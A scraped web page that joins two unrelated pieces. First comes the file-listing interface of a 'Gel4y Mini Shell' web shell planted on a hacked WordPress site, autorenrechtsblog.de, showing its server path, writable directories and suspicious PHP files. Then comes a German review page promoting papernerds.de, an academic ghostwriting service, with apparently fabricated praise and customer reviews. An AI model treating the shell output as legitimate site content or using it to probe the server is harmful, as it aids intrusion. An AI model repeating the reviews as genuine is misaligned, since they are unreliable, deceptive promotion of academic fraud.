Gel4y Mini Shell

PHP Version : 8.0.30
+File +Directory
  • Server : autorenrechtsblog.de (/3.144.35.148)
  • Path: ~/mnt/web015/d2/28/511469628/htdocs/ghostwriterblog.net/autorenrechtsblog.de/
    Name Size Permission Action
    wp-admin N/A drwxrwxrwx
    wp-content N/A drwxrwxrwx
    wp-includes N/A drwxrwxrwx
    .htaccess 0.199KB -r--r--r--
    .user.ini 0.002KB -rw-r-----
    access.log 0.081KB -rw-r-----
    index.php 7.342KB -r--r--r--
    index.php1 0.396KB -rwxrwxrwx
    license.txt 19.448KB -rw-r--r--
    liesmich.html 8.428KB -rw-r--r--
    readme.html 7.229KB -rw-r--r--
    robots.txt 1.821KB -rw-r-----
    ss.php 13.495KB -rw-r-----
    uxo.txt 0.001KB -rw-r-----
    wp-aa.php 7.638KB -rw-r-----
    wp-activate.php 7.036KB -rw-r--r--
    wp-blog-header.php 0.343KB -rwxrwxrwx
    wp-comments-post.php 2.283KB -rw-r--r--
    wp-config-sample.php 2.942KB -rw-r--r--
    wp-config.php 3.764KB -rw-r--r--
    wp-cron.php 5.931KB -rw-r--r--
    wp-links-opml.php 2.443KB -rw-r--r--
    wp-load.php 4.279KB -rw-r--r--
    wp-login.php 48.773KB -rw-r--r--
    wp-mail.php 8.341KB -rw-r--r--
    wp-opml.php 59.478KB -rw-r-----
    wp-settings.php 25.199KB -rw-r--r--
    wp-signup.php 33.545KB -rw-r--r--
    wp-trackback.php 4.774KB -rw-r--r--
    xmlrpc.php 3.162KB -rw-r--r--
    Copyright © 2021 - Powered By Indonesian Darknet
    papernerds.de Erfahrungen - autorenrechtsblog.de
    4,0
    Rated 4 out of 5
    4 von 5 Sternen (basierend auf 360 Bewertungen)
    Ausgezeichnet35%
    Sehr gut33%
    Durchschnittlich32%
    Schlecht0%
    Furchtbar0%

    papernerds.de Erfahrungen

    Das ist papernerds.de

    In unserer Funktion als Partner und Beschützer für Studierende prüfen wir Agenturen und Dienstleister verschiedenster Art auf ihre Verlässlichkeit und die Qualität ihrer erbrachten Dienstleistungen. Es sind leider zu viele Fälle von betrogenen Studierenden in den Medien zu finden. Wie verlief also unsere Erfahrung mit papernerds.de?

    Das Unternehmen hat seinen Sitz in Deutschland und nicht im Ausland, was Transaktionen und Services für Studierende besonders sicher macht.

    Aber allein das war nicht ausschlaggebend für unsere Bewertung. Natürlich haben wir im Sinne unserer Leserinnen und Leser eine Testbestellung aufgegeben, um den Service eingehend zu prüfen. Unsere erste Begegnung mit papernerds.de war sehr positiv. Nach unserem Anruf hatten wir sofort eine sehr freundliche Person am Telefon, die uns ausführlich über den gesamten Prozess der Arbeitserstellung informierte. Der Preis war ausgesprochen fair.

    Unsere Erwartungen an die Arbeit waren wissenschaftlicher Art. Der Ansprechpartner zeigte sich sehr kompetent und beantwortete alle Fragen ehrlich und zu unserer Zufriedenheit.

    Im Anschluss haben wir den Projektplan vorgelegt und den Preis verhandelt.

    Der Text wurde innerhalb der vereinbarten Frist erstellt und nach der Übergabe auf wissenschaftliche Korrektheit und Plagiate geprüft. Der Text war ein Unikat und die wissenschaftliche Tiefe entsprach dem Thema.

    Unsere Erfahrung mit papernerds.de war durch und durch positiv. Wir können den Service wärmstens empfehlen.

    Zusätzlich zu unserer eigenen Meinung verlassen wir uns in unserem Zwei-Phasen-Prüfsystem auch auf Kundenbewertungen von papernerds.de. Auch Sie sind herzlich eingeladen, Ihren Teil zum Schutz der Studierenden beizutragen und die Leistung von papernerds.de zu bewerten. Herzlichen Dank für Ihre Beteiligung!

    papernerds.de ERFAHRUNGEN & REVIEWS

    Art der Arbeit: Korrektur und Fertigstellung der fertigen Arbeit

    Rated 4 out of 5
    Dezember 4, 2023

    Ich möchte der Firma und meinem Manager für ihre Schnelligkeit und Hilfe danken !!

    Damir Longo

    Art der Arbeit: Korrektur

    Rated 3 out of 5
    Dezember 4, 2023

    Ich möchte der Firma papernerds meinen großen Dank aussprechen. Angenehme Kommunikation, hervorragende Mitarbeiter und vor allem gute Arbeit !!! Vielen Dank!!!

    Dagobert London

    Art der Arbeit: Kontrollarbeit in französischer Sprache

    Rated 5 out of 5
    Dezember 4, 2023

    Ich möchte den papernerds danken, der praktisch alle meine Kontrollprobleme gelöst hat, und in der Informatik habe ich sogar eine Notiz hinzugefügt, wo ich eine gut ausgeführte Arbeit bewunderte! Danke an alle!

    Cyril Lola

    Art der Arbeit: Zusammenfassung

    Rated 4 out of 5
    November 28, 2023

    Alles ist großartig, danke.

    Avery Lucian

    Art der Arbeit: Zeichnung

    Rated 4 out of 5
    November 28, 2023

    Alles ist ganz toll geworden. Ich bedanke mich und wünsche weiterhin viel Erfolg! ?

    Avdeev Lucia

    Art der Arbeit: Wissenschaftlicher Artikel

    Rated 4 out of 5
    November 28, 2023

    Alles ist einfach super!

    Ava Luca

    Art der Arbeit: Problemlösung

    Rated 4 out of 5
    November 27, 2023

    Ich habe zum ersten Mal meine Aufgaben nicht selbst gelöst und war angenehm überrascht von den Preisen und der Arbeit! Danke an Papernerds für ihre operative Arbeit. Viel Glück!

    Bernd Andriana

    Art der Arbeit: Praxisbericht

    Rated 5 out of 5
    November 27, 2023

    Ich habe zum ersten mal hier bestellt und wurde nicht entäuscht! Danke an alle die an meinem Projekt mitgearbeitet haben und dafür gibt es eine gute Bewertung *5

    Bernadeta Andrian

    Art der Arbeit: Präsentationen

    Rated 3 out of 5
    November 25, 2023

    Alles fertig, Arbeit sogar noch früher abgeschlossen, Note 1, alles ist ideal und billig!

    Chiara Anna

    Art der Arbeit: Psychologie

    Rated 5 out of 5
    November 23, 2023

    Alles ist perfekt, danke für die rechtzeitige Abgabe, es ist sehr praktisch.

    Camila Kei